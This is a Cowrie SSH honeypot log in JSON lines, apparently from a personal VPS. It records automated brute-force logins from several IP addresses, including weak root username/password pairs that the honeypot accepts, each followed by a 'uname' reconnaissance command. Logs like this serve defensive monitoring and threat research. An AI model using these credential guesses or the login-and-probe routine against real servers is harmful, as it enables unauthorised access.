{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:28:42.261766Z","src_ip":"196.251.86.249","session":"e57a40d678a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48042,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e3bb76023b7","protocol":"ssh","message":"New connection: 212.227.125.160:48042 (1.2.3.4:22) [session: 3e3bb76023b7]","sensor":"my-vps","timestamp":"2025-08-26T11:28:42.309716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:42.313730Z","src_ip":"212.227.125.160","session":"3e3bb76023b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:42.360793Z","src_ip":"212.227.125.160","session":"3e3bb76023b7"}
{"eventid":"cowrie.login.failed","username":"33sqn","password":"33sqn","message":"login attempt [33sqn/33sqn] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:42.586273Z","src_ip":"212.227.125.160","session":"3e3bb76023b7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:43.638484Z","src_ip":"212.227.125.160","session":"3e3bb76023b7"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52634,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2780601e0cb","protocol":"ssh","message":"New connection: 83.168.105.65:52634 (1.2.3.4:22) [session: c2780601e0cb]","sensor":"my-vps","timestamp":"2025-08-26T11:28:43.787593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:43.788364Z","src_ip":"83.168.105.65","session":"c2780601e0cb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:43.826484Z","src_ip":"83.168.105.65","session":"c2780601e0cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:28:43.938561Z","src_ip":"83.168.105.65","session":"c2780601e0cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:28:44.029598Z","src_ip":"83.168.105.65","session":"c2780601e0cb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:28:44.030412Z","src_ip":"83.168.105.65","session":"c2780601e0cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:44.068954Z","src_ip":"83.168.105.65","session":"c2780601e0cb"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:44.069960Z","src_ip":"83.168.105.65","session":"c2780601e0cb"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"pass1234","message":"login attempt [hadoop/pass1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:44.325289Z","src_ip":"196.251.86.249","session":"e57a40d678a3"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:45.841091Z","src_ip":"196.251.86.249","session":"e57a40d678a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48816,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cb6080477bd","protocol":"ssh","message":"New connection: 212.227.125.160:48816 (1.2.3.4:22) [session: 5cb6080477bd]","sensor":"my-vps","timestamp":"2025-08-26T11:28:47.844758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:47.905772Z","src_ip":"212.227.125.160","session":"5cb6080477bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:47.906445Z","src_ip":"212.227.125.160","session":"5cb6080477bd"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:48.310167Z","src_ip":"212.227.125.160","session":"5cb6080477bd"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:49.366428Z","src_ip":"212.227.125.160","session":"5cb6080477bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49584,"dst_ip":"1.2.3.4","dst_port":22,"session":"211cf126e3c9","protocol":"ssh","message":"New connection: 212.227.125.160:49584 (1.2.3.4:22) [session: 211cf126e3c9]","sensor":"my-vps","timestamp":"2025-08-26T11:28:53.485967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:53.540856Z","src_ip":"212.227.125.160","session":"211cf126e3c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:53.596450Z","src_ip":"212.227.125.160","session":"211cf126e3c9"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:28:54.008405Z","src_ip":"212.227.125.160","session":"211cf126e3c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:28:54.276329Z","src_ip":"212.227.125.160","session":"211cf126e3c9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:28:54.277024Z","src_ip":"212.227.125.160","session":"211cf126e3c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:54.536030Z","src_ip":"212.227.125.160","session":"211cf126e3c9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:28:54.537071Z","src_ip":"212.227.125.160","session":"211cf126e3c9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56954,"dst_ip":"1.2.3.4","dst_port":22,"session":"0062c0272085","protocol":"ssh","message":"New connection: 83.168.105.65:56954 (1.2.3.4:22) [session: 0062c0272085]","sensor":"my-vps","timestamp":"2025-08-26T11:28:59.388015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:59.388805Z","src_ip":"83.168.105.65","session":"0062c0272085"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:59.425376Z","src_ip":"83.168.105.65","session":"0062c0272085"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50364,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2ad7618a8d4","protocol":"ssh","message":"New connection: 212.227.125.160:50364 (1.2.3.4:22) [session: e2ad7618a8d4]","sensor":"my-vps","timestamp":"2025-08-26T11:28:59.497986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:28:59.499971Z","src_ip":"212.227.125.160","session":"e2ad7618a8d4"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:59.535596Z","src_ip":"83.168.105.65","session":"0062c0272085"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:28:59.552218Z","src_ip":"212.227.125.160","session":"e2ad7618a8d4"}
{"eventid":"cowrie.login.failed","username":"sem5","password":"sem5","message":"login attempt [sem5/sem5] failed","sensor":"my-vps","timestamp":"2025-08-26T11:28:59.827046Z","src_ip":"212.227.125.160","session":"e2ad7618a8d4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:00.573768Z","src_ip":"83.168.105.65","session":"0062c0272085"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:00.881634Z","src_ip":"212.227.125.160","session":"e2ad7618a8d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51136,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cf0a78c4680","protocol":"ssh","message":"New connection: 212.227.125.160:51136 (1.2.3.4:22) [session: 1cf0a78c4680]","sensor":"my-vps","timestamp":"2025-08-26T11:29:05.517982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:05.519271Z","src_ip":"212.227.125.160","session":"1cf0a78c4680"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:05.572754Z","src_ip":"212.227.125.160","session":"1cf0a78c4680"}
{"eventid":"cowrie.login.failed","username":"esearch","password":"esearch","message":"login attempt [esearch/esearch] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:05.733155Z","src_ip":"212.227.125.160","session":"1cf0a78c4680"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:06.788106Z","src_ip":"212.227.125.160","session":"1cf0a78c4680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51904,"dst_ip":"1.2.3.4","dst_port":22,"session":"321879412507","protocol":"ssh","message":"New connection: 212.227.125.160:51904 (1.2.3.4:22) [session: 321879412507]","sensor":"my-vps","timestamp":"2025-08-26T11:29:10.842881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:10.872790Z","src_ip":"212.227.125.160","session":"321879412507"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:10.942130Z","src_ip":"212.227.125.160","session":"321879412507"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:29:11.333268Z","src_ip":"212.227.125.160","session":"321879412507"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:29:11.705812Z","src_ip":"212.227.125.160","session":"321879412507"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:29:11.706486Z","src_ip":"212.227.125.160","session":"321879412507"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:11.905649Z","src_ip":"212.227.125.160","session":"321879412507"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:11.906758Z","src_ip":"212.227.125.160","session":"321879412507"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41134,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb505706bc87","protocol":"ssh","message":"New connection: 83.168.105.65:41134 (1.2.3.4:22) [session: eb505706bc87]","sensor":"my-vps","timestamp":"2025-08-26T11:29:15.202879Z"}
